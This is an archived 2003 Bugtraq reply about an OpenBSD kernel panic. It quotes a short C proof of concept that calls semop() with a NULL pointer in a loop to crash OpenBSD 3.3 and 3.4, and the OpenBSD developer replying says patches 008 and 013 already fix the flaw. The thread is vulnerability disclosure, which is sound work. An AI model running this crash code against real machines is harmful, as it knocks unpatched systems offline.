Re: yet another panic() in OpenBSD
From: Henning Brauer (henning_at_openbsd.org)
Date: 11/22/03
- Previous message: :: Operash ::: "[Opera 7] Arbitrary File Auto-Saved Vulnerability."
- In reply to: noir_at_uberhax0r.net: "yet another panic() in OpenBSD"
- Next in thread: Coleman Kane: "Re: yet another panic() in OpenBSD"
- Reply: Coleman Kane: "Re: yet another panic() in OpenBSD"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Sat, 22 Nov 2003 23:39:23 +0100 To: bugtraq@securityfocus.com
On Fri, Nov 21, 2003 at 05:46:01PM -0500, noir@uberhax0r.net wrote:
> a project lacking the basic QA and unit testing and here is the outcome:
>
> #include <stdio.h>
> #include <sys/types.h>
> #include <sys/sem.h>
> #include <sys/ipc.h>
>
> int
> main()
> {
> int i;
>
> for(i = 0; i < 0x40; i++)
> semop(i, (struct sembuf *) NULL, 0);
>
> }
>
>
> PANIC in OpenBSD 3.3 and 3.4 is confirmed.
please note that patch 008 for OpenBSD 3.4 / 013 for OpenBSD 3.3 fixes
that issue.
This patch was out _before_ the above post.
It's not really hard to look at the patch and post to fd and bugtraq
afterwards...
-- Henning Brauer, BS Web Services, http://bsws.de hb@bsws.de - henning@openbsd.org Unix is very simple, but it takes a genius to understand the simplicity. (Dennis Ritchie)
- Previous message: :: Operash ::: "[Opera 7] Arbitrary File Auto-Saved Vulnerability."
- In reply to: noir_at_uberhax0r.net: "yet another panic() in OpenBSD"
- Next in thread: Coleman Kane: "Re: yet another panic() in OpenBSD"
- Reply: Coleman Kane: "Re: yet another panic() in OpenBSD"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|